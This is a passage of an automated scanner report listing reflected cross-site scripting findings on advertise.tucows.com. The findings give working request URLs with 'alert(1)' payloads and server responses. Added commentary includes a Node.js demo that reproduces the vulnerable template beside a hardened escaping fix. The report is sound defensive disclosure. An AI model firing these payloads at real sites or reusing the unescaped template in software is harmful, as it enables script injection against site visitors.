Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbarb9378"-alert(1)-"68cf811d6fc/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.7. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1d63"-alert(1)-"f61e34bb76a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0f1d63"-alert(1)-"f61e34bb76a/css/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:45 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbar/cb3.0f1d63"-alert(1)-"f61e34bb76a/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.8. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8543"-alert(1)-"e7c1cf5b326 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/cssf8543"-alert(1)-"e7c1cf5b326/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbar/cb3.0/cssf8543"-alert(1)-"e7c1cf5b326/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.9. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 471ee"-alert(1)-"f64e6d809a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/css/style.css471ee"-alert(1)-"f64e6d809a6 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:57:07 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css471ee"-alert(1)-"f64e6d809a6";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.10. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6d10"-alert(1)-"e562c2cd8f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesa6d10"-alert(1)-"e562c2cd8f4/js/aalib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includesa6d10"-alert(1)-"e562c2cd8f4/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.11. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f2c"-alert(1)-"78bef03947c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js33f2c"-alert(1)-"78bef03947c/aalib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js33f2c"-alert(1)-"78bef03947c/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.12. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f00"-alert(1)-"b89799debf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/aalib.js22f00"-alert(1)-"b89799debf7 HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:52 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/aalib.js22f00"-alert(1)-"b89799debf7";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.13. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dffd4"-alert(1)-"6bee40325ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesdffd4"-alert(1)-"6bee40325ed/js/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:19 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includesdffd4"-alert(1)-"6bee40325ed/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...
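Every finding in this block lands on the site-wide "Page Not Found" template, which copies the full request URL (path segments included) into the inline `url = "…";` assignment. The three "REST URL parameters" reported per file are therefore one sink with one fix, and the 404 status is no mitigation: the browser parses and runs inline script in an error page exactly as it would in a 200. The payload works because `"…"-alert(1)-"…"` is a valid expression: the injected quote closes the literal, `alert(1)` runs as the operand of a subtraction, and the second quote re-opens a string that swallows the rest of the original value.

The following is an added example, not code from the report or from the scanned site. It reproduces that sink in miniature, shows the canary executing, and pairs it with a hardened renderer that emits the value as a JavaScript string literal that is also safe inside an HTML `<script>` element. The template, the function names and the two sample inputs are assumptions constructed from the first finding above; it runs under Node.js with no dependencies.

```javascript
// Added example, not code from the report or from advertise.tucows.com: it
// reproduces the sink the report shows (the request URL concatenated raw into
// `url = "...";` inside an inline <script>) and a hardened replacement.
// Function names and the template are assumptions made for illustration.
// Runs under Node.js with no dependencies.

// Constructed from the first finding above: the scanner's canary
// `dffd4"-alert(1)-"6bee40325ed` placed in the first path segment.
const PAYLOAD_URL =
  'http://advertise.tucows.com/includesdffd4"-alert(1)-"6bee40325ed/js/ajaxlib.js';
const CANARY = 'dffd4"-alert(1)-"6bee40325ed';

// Approximation of the vulnerable 404 template: raw string concatenation.
function renderVulnerable(requestUrl) {
  return '<script>\nurl = "' + requestUrl + '";\n</script>';
}

// Encode a value as a JavaScript string literal that is safe inside an HTML
// <script> element. JSON.stringify handles quotes, backslashes and control
// characters; the extra replacements cover what it leaves alone:
//   <  >  &   so "</script>" and "<!--" cannot change the HTML tokenizer's
//             state (and the output is also safe in XHTML)
//   U+2028/9  line terminators that end a string literal in older engines
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, function (c) {
    return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

// Hardened template: the same sink, but the value is always one string literal.
function renderHardened(requestUrl) {
  return '<script>\nurl = ' + jsStringLiteral(requestUrl) + ';\n</script>';
}

// Stand-in for the browser: pull out the first inline script and run it with a
// recording alert() so we can see whether injected code executes and what
// value `url` ends up holding.
function executeInlineScript(html) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  if (m === null) throw new Error('no <script> element found');
  const alerts = [];
  const run = new Function('alert', 'var url;\n' + m[1] + '\nreturn url;');
  const url = run(function (x) { alerts.push(x); });
  return { url: url, alerts: alerts };
}

// The scanner's test in miniature: a canary containing a double quote comes
// back verbatim inside a <script> element.
function canaryReflectedInScript(html, canary) {
  const m = /<script>([\s\S]*?)<\/script>/.exec(html);
  return m !== null && m[1].indexOf(canary) !== -1;
}

// How many "</script>" closers the HTML tokenizer would see; more than one
// means a value broke out of the script element entirely.
function countScriptClosers(html) {
  return (html.match(/<\/script>/gi) || []).length;
}

function demo() {
  const v = executeInlineScript(renderVulnerable(PAYLOAD_URL));
  const h = executeInlineScript(renderHardened(PAYLOAD_URL));
  console.log('vulnerable: alerts =', JSON.stringify(v.alerts), 'url =', String(v.url));
  console.log('hardened:   alerts =', JSON.stringify(h.alerts), 'url =', h.url);
  return { vulnerable: v, hardened: h };
}

demo();
```

With the vulnerable template the recorded `alert` fires once and `url` ends up as `NaN`; with the hardened one nothing fires and `url` round-trips to the original value, quotes included. The server in these responses identifies itself as PHP 5.3, where the same encoding is `json_encode($url, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT)` (those flags exist from PHP 5.3.0), applied at the one template that produces the 404 page. Escaping for a JavaScript string context is the fix only because the value is used as a string; if it were later written into the DOM as HTML, that context would need its own encoding.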

3.14. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78547"-alert(1)-"ce4057ee76f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js78547"-alert(1)-"ce4057ee76f/ajaxlib.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:24 GMT
